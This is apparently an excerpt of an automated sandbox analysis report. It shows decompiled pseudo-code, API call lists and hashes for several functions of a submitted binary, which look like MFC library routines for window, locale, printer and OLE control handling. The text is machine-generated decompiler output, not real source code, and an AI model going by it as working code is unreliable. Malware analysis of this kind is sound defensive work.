      0x009b44e6
      0x009b44e6
      0x009b4411

      APIs
        • Part of subcall function 009B42D4: GetParent.USER32(009A4695), ref: 009B4328
        • Part of subcall function 009B42D4: GetLastActivePopup.USER32(009A4695), ref: 009B4339
        • Part of subcall function 009B42D4: IsWindowEnabled.USER32(009A4695), ref: 009B434D
        • Part of subcall function 009B42D4: EnableWindow.USER32(009A4695,00000000), ref: 009B4360
      • EnableWindow.USER32(?,00000001), ref: 009B43D3
      • GetWindowThreadProcessId.USER32(?,?), ref: 009B43E7
      • GetCurrentProcessId.KERNEL32 ref: 009B43F1
      • SendMessageA.USER32 ref: 009B4409
      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 009B4483
      • EnableWindow.USER32(00000000,00000001), ref: 009B44C8
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
      • String ID: 0
      • API String ID: 1877664794-4108050209
      • Opcode ID: 2374ccc4e4640b031f4a90f33e1e9a95355179fcbb67eb09df6a94dfa5263256
      • Instruction ID: d9ba75eef14d5cd0885d79a32fdb40ca5293c5d62f634024f58227ff0e868b8a
      • Opcode Fuzzy Hash: 2374ccc4e4640b031f4a90f33e1e9a95355179fcbb67eb09df6a94dfa5263256
      • Instruction Fuzzy Hash: FF41D172A0022CABDB20DF64CE46BD9B7F9FF44720F1405A5F65596292D7B08E909F90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A2C90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
      Download Yara Rule
      C-Code - Quality: 92%
      			E009A2C90(char _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				void* __edi;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;
				signed int _t48;
				signed int _t49;
				char _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;

				_push(0xffffffff);
				_push(0xac7878);
				_push( *[fs:0x0]);
				_t29 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t29 ^ _t73);
				 *[fs:0x0] =  &_v16;
				E00AC5AED( &_v28, 0);
				_t51 =  *0xd0e048; // 0x2781240
				_v8 = 0;
				_v20 = _t51;
				if( *0xd0e04c == 0) {
					E00AC5AED( &_v24, 0);
					if( *0xd0e04c == 0) {
						_t48 =  *0xd14518; // 0x2
						_t49 = _t48 + 1;
						 *0xd14518 = _t49;
						 *0xd0e04c = _t49;
					}
					E00AC5B15( &_v24);
				}
				_t67 = _a4;
				_t70 =  *0xd0e04c; // 0x2
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v8 = 0xffffffff;
							E00AC5B15( &_v28);
							 *[fs:0x0] = _v16;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E009A2720(_t65, _t67,  &_v20, _t67);
							__eflags = _t37 - 0xffffffff;
							if(_t37 == 0xffffffff) {
								E00AAAF63( &_v40, "bad cast");
								E00AAB8C9( &_v40, 0xb0b234);
							}
							_t71 = _v20;
							 *0xd0e048 = _t71;
							E00AC5AED( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							__eflags = _t39 - 0xffffffff;
							if(_t39 < 0xffffffff) {
								_t42 = _t39 + 1;
								__eflags = _t42;
								 *((intOrPtr*)(_t71 + 4)) = _t42;
							}
							E00AC5B15( &_a4);
							E00AC5B41(__eflags, _t71);
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E00AC5BB8();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t65 =  *((intOrPtr*)(_t45 + 8));
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}























      0x009a2c93
      0x009a2c95
      0x009a2ca0
      0x009a2ca7
      0x009a2cae
      0x009a2cb2
      0x009a2cbd
      0x009a2cc9
      0x009a2ccf
      0x009a2cd6
      0x009a2cd9
      0x009a2ce0
      0x009a2cec
      0x009a2cee
      0x009a2cf3
      0x009a2cf4
      0x009a2cf9
      0x009a2cf9
      0x009a2d01
      0x009a2d01
      0x009a2d06
      0x009a2d09
      0x009a2d0f
      0x009a2d14
      0x009a2d38
      0x00000000
      0x009a2d16
      0x009a2d19
      0x009a2d1e
      0x009a2d3c
      0x009a2d3c
      0x009a2d3e
      0x009a2d40
      0x009a2da7
      0x009a2daa
      0x009a2db1
      0x009a2dbb
      0x009a2dc9
      0x009a2dc9
      0x009a2d42
      0x009a2d44
      0x009a2d4f
      0x009a2d57
      0x009a2d5a
      0x009a2d64
      0x009a2d72
      0x009a2d72
      0x009a2d77
      0x009a2d7f
      0x009a2d85
      0x009a2d8a
      0x009a2d8d
      0x009a2d90
      0x009a2d92
      0x009a2d92
      0x009a2d93
      0x009a2d93
      0x009a2d99
      0x009a2d9f
      0x009a2d46
      0x009a2d46
      0x009a2d46
      0x00000000
      0x009a2d44
      0x009a2d20
      0x009a2d24
      0x00000000
      0x00000000
      0x009a2d26
      0x009a2d2e
      0x00000000
      0x00000000
      0x009a2d30
      0x009a2d33
      0x00000000
      0x009a2d33

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2CBD
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2CE0
      • std::bad_exception::bad_exception.LIBCMT ref: 009A2D64
      • __CxxThrowException@8.LIBCMT ref: 009A2D72
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2D85
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 009A2D9F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
      • String ID: bad cast
      • API String ID: 2427920155-3145022300
      • Opcode ID: 128808e961abf13e4944d13e9e75c18edaac94563608cf10631c9028ea9a42b1
      • Instruction ID: 9d809325553c8011949b22af50019ad46d9c2317ac267db0e50396061b2fc4f4
      • Opcode Fuzzy Hash: 128808e961abf13e4944d13e9e75c18edaac94563608cf10631c9028ea9a42b1
      • Instruction Fuzzy Hash: 0231F3B1D002049BDB14DF28C981FAEB774EB05720F11465DE826A72D2EB306E40CBE1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B23A9 Relevance: 12.1, APIs: 8, Instructions: 96COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 97%
      			E009B23A9(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t37;
				int _t38;
				void* _t39;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr _t76;
				void* _t77;

				_t74 = __edi;
				_push(0x214);
				E00AAD2D1(0xac825a, __ebx, __edi, __esi);
				_t76 = __ecx;
				 *((intOrPtr*)(_t77 - 0x21c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0xad912c;
				_t66 =  *((intOrPtr*)(__ecx + 0x5c));
				 *(_t77 - 4) = 0;
				 *(_t77 - 4) = 1;
				if(_t66 != 0) {
					 *((intOrPtr*)( *_t66 + 4))(1);
				}
				_t67 =  *((intOrPtr*)(_t76 + 0x8c));
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67 + 0x1c))(1);
				}
				_t68 =  *((intOrPtr*)(_t76 + 0x90));
				_t83 = _t68;
				if(_t68 != 0) {
					 *((intOrPtr*)( *_t68 + 4))(1);
				}
				if( *((intOrPtr*)(E009BD77F(0, _t74, _t76, _t83) + 0x14)) == 0) {
					_t72 =  *0xd0fb70; // 0x0
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 4))(1);
						 *0xd0fb70 = 0;
					}
					_t73 =  *0xd0fb6c; // 0x0
					if(_t73 != 0) {
						 *((intOrPtr*)( *_t73 + 4))(1);
						 *0xd0fb6c = 0;
					}
				}
				_t35 =  *((intOrPtr*)(_t76 + 0x74));
				if( *((intOrPtr*)(_t76 + 0x74)) != 0) {
					E009BB9E5(_t35);
				}
				_t36 =  *((intOrPtr*)(_t76 + 0x78));
				if( *((intOrPtr*)(_t76 + 0x78)) != 0) {
					E009BB9E5(_t36);
				}
				_t37 =  *(_t76 + 0x98) & 0x0000ffff;
				if(_t37 != 0) {
					GlobalDeleteAtom(_t37);
				}
				_t38 =  *(_t76 + 0x9a) & 0x0000ffff;
				if(_t38 != 0) {
					GlobalDeleteAtom(_t38);
				}
				_t69 =  *((intOrPtr*)(_t76 + 0x94));
				_t91 = _t69;
				if(_t69 != 0) {
					 *((intOrPtr*)( *_t69 + 4))(1);
				}
				_t39 = E009BD77F(0, _t74, _t76, _t91);
				if( *((intOrPtr*)(_t39 + 0x10)) ==  *((intOrPtr*)(_t76 + 0x50))) {
					 *((intOrPtr*)(_t39 + 0x10)) = 0;
				}
				if( *((intOrPtr*)(_t39 + 4)) == _t76) {
					 *((intOrPtr*)(_t39 + 4)) = 0;
				}
				E00AAB4AB( *((intOrPtr*)(_t76 + 0x50)));
				E00AAB4AB( *((intOrPtr*)(_t76 + 0x58)));
				E00AAB4AB( *((intOrPtr*)(_t76 + 0x64)));
				E00AAB4AB( *((intOrPtr*)(_t76 + 0x68)));
				E00AAB4AB( *((intOrPtr*)(_t76 + 0x6c)));
				 *((intOrPtr*)(_t76 + 0x2c)) = 0;
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				E009B2B95(0, _t76, _t74, _t76,  *(_t77 - 4));
				return E00AAD32D(0, _t74, _t76);
			}














      0x009b23a9
      0x009b23a9
      0x009b23b3
      0x009b23b8
      0x009b23ba
      0x009b23c0
      0x009b23c6
      0x009b23cb
      0x009b23ce
      0x009b23d4
      0x009b23da
      0x009b23da
      0x009b23dd
      0x009b23e5
      0x009b23eb
      0x009b23eb
      0x009b23ee
      0x009b23f4
      0x009b23f6
      0x009b23fc
      0x009b23fc
      0x009b2407
      0x009b2409
      0x009b2411
      0x009b2417
      0x009b241a
      0x009b241a
      0x009b2420
      0x009b2428
      0x009b242e
      0x009b2431
      0x009b2431
      0x009b2428
      0x009b2437
      0x009b243c
      0x009b243f
      0x009b243f
      0x009b2444
      0x009b2449
      0x009b244c
      0x009b244c
      0x009b2451
      0x009b245b
      0x009b245e
      0x009b245e
      0x009b2464
      0x009b246e
      0x009b2471
      0x009b2471
      0x009b2477
      0x009b247d
      0x009b247f
      0x009b2485
      0x009b2485
      0x009b2488
      0x009b2493
      0x009b2495
      0x009b2495
      0x009b249b
      0x009b249d
      0x009b249d
      0x009b24a3
      0x009b24ab
      0x009b24b3
      0x009b24bb
      0x009b24c3
      0x009b24cb
      0x009b2586
      0x009b258c
      0x009b2596

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _free$AtomDeleteGlobal$H_prolog3_catch_
      • String ID:
      • API String ID: 1844215989-0
      • Opcode ID: 72272cf09e45da0b3f3d83d11c0e852da03555cfb0786b65bebacdc0bd0c4944
      • Instruction ID: a6f13d92232007ac66d1fc957628f9fc064cbbb015b5549b887c71d0163125b5
      • Opcode Fuzzy Hash: 72272cf09e45da0b3f3d83d11c0e852da03555cfb0786b65bebacdc0bd0c4944
      • Instruction Fuzzy Hash: F83103705007409FCB24EFB4C695AA977E6FF05314F54886DF19A8BAA2CB75DC41CB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1A04 Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E009B1A04(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x78);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x74);
							if( *(_t35 + 0x74) != 0) {
								E009BB9E5(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x74) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E009BB9E5( *(_t35 + 0x74));
								 *(_t35 + 0x74) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







      0x009b1a09
      0x009b1a0b
      0x009b1a0d
      0x009b1a15
      0x009b1a2f
      0x009b1a37
      0x009b1a41
      0x009b1a48
      0x009b1a4a
      0x009b1a4f
      0x009b1a52
      0x009b1a52
      0x009b1a69
      0x009b1a70
      0x009b1a88
      0x009b1a8d
      0x009b1a92
      0x009b1a92
      0x009b1a98
      0x009b1a98
      0x009b1a48
      0x009b1a9d
      0x009b1aa1

      APIs
      • GlobalLock.KERNEL32 ref: 009B1A23
      • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,009AE5E5,?), ref: 009B1A2F
      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,009AE5E5,?), ref: 009B1A41
      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,009AE5E5,?), ref: 009B1A61
      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 009B1A69
      • GlobalLock.KERNEL32 ref: 009B1A73
      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,009AE5E5,?), ref: 009B1A80
      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,009AE5E5,?), ref: 009B1A98
        • Part of subcall function 009BB9E5: GlobalFlags.KERNEL32(?), ref: 009BB9F4
        • Part of subcall function 009BB9E5: GlobalUnlock.KERNEL32(?,?,?,?,009B2451,?,00000214,009A47AB), ref: 009BBA05
        • Part of subcall function 009BB9E5: GlobalFree.KERNEL32 ref: 009BBA0F
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
      • String ID:
      • API String ID: 168474834-0
      • Opcode ID: 96b0b232e8413c9911510834969f856ec1122f03cf63e4de027b66c40d6ffae3
      • Instruction ID: c5d01d6d17205f3dbafd3e15fed01f2d8046200ddc8d97b858916d04a2ea0534
      • Opcode Fuzzy Hash: 96b0b232e8413c9911510834969f856ec1122f03cf63e4de027b66c40d6ffae3
      • Instruction Fuzzy Hash: 6C11EC72500A00BBDB22ABA6CE8ADBF7BFDEB85B50B040519F605D2020D731ED81DB20
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B5CC3 Relevance: 10.7, APIs: 7, Instructions: 245memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 67%
      			E009B5CC3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t146;
				int _t151;
				signed int _t155;
				short* _t156;
				intOrPtr _t160;
				signed int _t184;
				intOrPtr _t185;
				signed int _t186;
				intOrPtr _t191;
				struct tagRECT _t197;
				int _t198;
				signed int _t200;
				signed int _t201;
				void* _t228;
				intOrPtr _t232;
				short _t233;
				intOrPtr* _t240;
				signed int* _t242;
				signed int _t245;
				signed int* _t246;
				void* _t247;

				_push(0xa8);
				E00AAD29B(0xac84c9, __ebx, __edi, __esi);
				_t240 =  *((intOrPtr*)(_t247 + 0x14));
				_t242 =  *(_t247 + 0x1c);
				 *((intOrPtr*)(_t247 - 0x68)) =  *((intOrPtr*)(_t247 + 8));
				 *(_t247 - 0x7c) =  *(_t247 + 0xc);
				 *(_t247 - 0x50) =  *(_t247 + 0x18) & 0x0000ffff;
				 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 + 0x20));
				 *((intOrPtr*)(_t247 - 0x70)) =  *((intOrPtr*)(_t247 + 0x24));
				_t146 = _t240 + 0x12;
				 *((intOrPtr*)(_t247 - 0x58)) = _t146;
				if( *((intOrPtr*)(_t247 + 0x10)) != 0) {
					 *((intOrPtr*)(_t247 - 0x24)) =  *((intOrPtr*)(_t240 + 8));
					 *((intOrPtr*)(_t247 - 0x20)) =  *((intOrPtr*)(_t240 + 4));
					 *((short*)(_t247 - 0x1c)) =  *((intOrPtr*)(_t240 + 0xc));
					 *((short*)(_t247 - 0x1a)) =  *((intOrPtr*)(_t240 + 0xe));
					 *((short*)(_t247 - 0x16)) =  *_t146;
					_t232 = _t240 + 0x18;
					 *((short*)(_t247 - 0x18)) =  *(_t240 + 0x10);
					 *((short*)(_t247 - 0x14)) =  *((intOrPtr*)(_t240 + 0x14));
					_t240 = _t247 - 0x24;
					 *((intOrPtr*)(_t247 - 0x58)) = _t232;
				}
				_t233 =  *((short*)(_t240 + 0xa));
				_t197 =  *((short*)(_t240 + 8));
				 *((intOrPtr*)(_t247 - 0x28)) =  *((short*)(_t240 + 0xe)) + _t233;
				 *(_t247 - 0x34) = _t197;
				 *((intOrPtr*)(_t247 - 0x30)) = _t233;
				 *((intOrPtr*)(_t247 - 0x2c)) =  *((short*)(_t240 + 0xc)) + _t197;
				_t151 = MapDialogRect( *( *((intOrPtr*)(_t247 - 0x68)) + 0x20), _t247 - 0x34);
				 *(_t247 - 0x60) =  *(_t247 - 0x60) & 0x00000000;
				if( *((intOrPtr*)(_t247 - 0x4c)) >= 4) {
					_t201 =  *_t242;
					 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 - 0x4c)) - 4;
					_t242 =  &(_t242[1]);
					if(_t201 != 0) {
						__imp__#4(_t242, _t201);
						_t242 = _t242 + _t201 * 2;
						 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 - 0x4c)) - _t201 + _t201;
						 *(_t247 - 0x60) = _t151;
					}
				}
				 *(_t247 - 0x64) =  *(_t247 - 0x64) & 0x00000000;
				E009A5D70(_t247 - 0x5c, _t233, E009B9D52());
				 *((intOrPtr*)(_t247 - 4)) = 0;
				 *(_t247 - 0x78) = 0;
				 *(_t247 - 0x6c) = 0;
				 *(_t247 - 0x74) = 0;
				if( *(_t247 - 0x50) == 0x37a ||  *(_t247 - 0x50) == 0x37b) {
					_t155 =  *_t242;
					_t61 = _t155 - 0xc; // 0x36f
					_t233 = _t61;
					_t242 =  &(_t242[3]);
					 *(_t247 - 0x80) = _t155;
					 *((intOrPtr*)(_t247 - 0x54)) = _t233;
					if(_t233 <= 0) {
						L16:
						 *((intOrPtr*)(_t247 - 0x4c)) =  *((intOrPtr*)(_t247 - 0x4c)) - _t155;
						 *(_t247 - 0x50) =  *(_t247 - 0x50) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t184 =  *_t242;
						_t200 = _t242[1] & 0x0000ffff;
						 *((intOrPtr*)(_t247 - 0x54)) =  *((intOrPtr*)(_t247 - 0x54)) - 6;
						_t242 =  &(_t242[1]);
						 *(_t247 - 0x84) = _t184;
						if(_t184 != 0x80010001) {
							_t185 = E009A6291(__eflags, 0x1c);
							 *((intOrPtr*)(_t247 - 0x88)) = _t185;
							 *((char*)(_t247 - 4)) = 1;
							__eflags = _t185;
							if(_t185 == 0) {
								_t186 = 0;
								__eflags = 0;
							} else {
								_t186 = E009CC7DA(_t185,  *(_t247 - 0x64),  *(_t247 - 0x84), _t200);
							}
							 *((char*)(_t247 - 4)) = 0;
							 *(_t247 - 0x64) = _t186;
						} else {
							 *(_t247 - 0x6c) =  *_t242;
							_t246 =  &(_t242[4]);
							 *(_t247 - 0x74) = _t242[1];
							E009A6000(_t233, _t240, _t246);
							_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x5c)) - 0xc));
							_t228 = 0xffffffef;
							 *((intOrPtr*)(_t247 - 0x54)) =  *((intOrPtr*)(_t247 - 0x54)) + _t228 - _t191;
							_t242 = _t246 + _t191 + 1;
							 *(_t247 - 0x78) = _t200;
						}
					} while ( *((intOrPtr*)(_t247 - 0x54)) > 0);
					_t155 =  *(_t247 - 0x80);
					goto L16;
				} else {
					L17:
					_t156 =  *((intOrPtr*)(_t247 - 0x58));
					_t260 =  *_t156 - 0x7b;
					_push(_t247 - 0x44);
					_push(_t156);
					if( *_t156 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t198 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_push(_t242);
					 *((intOrPtr*)(_t247 - 0x58)) = _t156;
					E009D20D3(0, _t247 - 0xb4, _t240, _t242, _t260);
					asm("sbb esi, esi");
					_t245 =  ~( *(_t247 - 0x50) - 0x00000378 & 0x0000ffff) & _t247 - 0x000000b4;
					 *((char*)(_t247 - 4)) = 2;
					 *((intOrPtr*)(_t247 - 0x48)) = 0;
					_t261 =  *((intOrPtr*)(_t247 - 0x58));
					if( *((intOrPtr*)(_t247 - 0x58)) >= 0) {
						_push(1);
						if(E009CA44E(0,  *((intOrPtr*)(_t247 - 0x68)), _t233, _t240, _t245, _t261) != 0 && E009CA9CE( *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x68)) + 0x68)),  *(_t247 - 0x50) - 0x377, 0, _t247 - 0x44, 0,  *_t240, _t247 - 0x34,  *(_t240 + 0x10) & 0x0000ffff, _t245, 0 |  *(_t247 - 0x50) == 0x00000377,  *(_t247 - 0x60), _t247 - 0x48) != 0) {
							E009CBC84( *((intOrPtr*)(_t247 - 0x48)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t247 - 0x48)) + 0x24),  *(_t247 - 0x7c), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t247 - 0x48)) + 0x94) =  *(_t247 - 0x64);
							E009B2357(0,  *((intOrPtr*)(_t247 - 0x48)) + 0xa4, _t247 - 0x5c);
							 *((short*)( *((intOrPtr*)(_t247 - 0x48)) + 0x98)) =  *(_t247 - 0x78);
							 *( *((intOrPtr*)(_t247 - 0x48)) + 0x9c) =  *(_t247 - 0x6c);
							 *( *((intOrPtr*)(_t247 - 0x48)) + 0xa0) =  *(_t247 - 0x74);
						}
					}
					if( *(_t247 - 0x60) != _t198) {
						__imp__#6( *(_t247 - 0x60));
					}
					_t160 =  *((intOrPtr*)(_t247 - 0x48));
					if(_t160 == _t198) {
						 *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x70)))) = _t198;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x70)))) =  *((intOrPtr*)(_t160 + 0x24));
						_t198 = 1;
					}
					 *((char*)(_t247 - 4)) = 0;
					E009D2457(_t198, _t247 - 0xb4, _t233, _t240, _t245, 1);
					E009A5510( *((intOrPtr*)(_t247 - 0x5c)) + 0xfffffff0, _t233);
					return E00AAD31E(_t198, _t240, _t245);
				}
			}
























      0x009b5cc3
      0x009b5ccd
      0x009b5cd9
      0x009b5cdc
      0x009b5cdf
      0x009b5ce5
      0x009b5cec
      0x009b5cf2
      0x009b5cf8
      0x009b5cfb
      0x009b5cfe
      0x009b5d01
      0x009b5d09
      0x009b5d0f
      0x009b5d16
      0x009b5d20
      0x009b5d28
      0x009b5d30
      0x009b5d33
      0x009b5d37
      0x009b5d3b
      0x009b5d3e
      0x009b5d3e
      0x009b5d41
      0x009b5d49
      0x009b5d53
      0x009b5d62
      0x009b5d65
      0x009b5d68
      0x009b5d6b
      0x009b5d71
      0x009b5d79
      0x009b5d7b
      0x009b5d7d
      0x009b5d81
      0x009b5d86
      0x009b5d8a
      0x009b5d90
      0x009b5d95
      0x009b5d98
      0x009b5d98
      0x009b5d86
      0x009b5d9b
      0x009b5da8
      0x009b5db4
      0x009b5db7
      0x009b5dba
      0x009b5dbd
      0x009b5dc4
      0x009b5dd1
      0x009b5dd3
      0x009b5dd3
      0x009b5dd6
      0x009b5dd9
      0x009b5ddc
      0x009b5de1
      0x009b5e70
      0x009b5e70
      0x009b5e73
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b5de7
      0x009b5de7
      0x009b5de7
      0x009b5de9
      0x009b5ded
      0x009b5df1
      0x009b5df4
      0x009b5dff
      0x009b5e33
      0x009b5e39
      0x009b5e3f
      0x009b5e43
      0x009b5e45
      0x009b5e5a
      0x009b5e5a
      0x009b5e47
      0x009b5e53
      0x009b5e53
      0x009b5e5c
      0x009b5e60
      0x009b5e01
      0x009b5e03
      0x009b5e09
      0x009b5e10
      0x009b5e13
